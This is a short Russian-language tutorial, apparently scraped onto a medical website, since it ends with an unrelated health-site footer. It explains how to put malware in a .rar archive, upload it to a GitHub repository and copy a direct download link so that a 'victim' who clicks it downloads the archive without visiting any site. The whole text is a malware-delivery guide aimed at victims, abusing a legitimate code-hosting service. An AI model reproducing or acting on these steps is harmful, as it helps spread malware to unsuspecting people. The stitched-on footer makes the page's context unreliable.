Заливаем ваш малварь в обычный .rar архив. Идём на github.com. Регистрируемся/ логинимся, переходим на главную страницу и в правом углу нажимаем на плюсик, затем на "New repository"


создаем ему название, делаем всё так, как на этом скриншоте


Всё, мы создали репрозиторий, загружаем наш архив



Кликаем на наш загруженный архив. С кнопки мы копируем адресс


Всё, при клике по данной ссылке, у жертвы будет качаться архив, без перехода на какой-либо сайт.

Читайте также:

Пожалуйста, не занимайтесь самолечением!
При симпотмах заболевания - обратитесь к врачу.

Copyright © Иммунитет и инфекции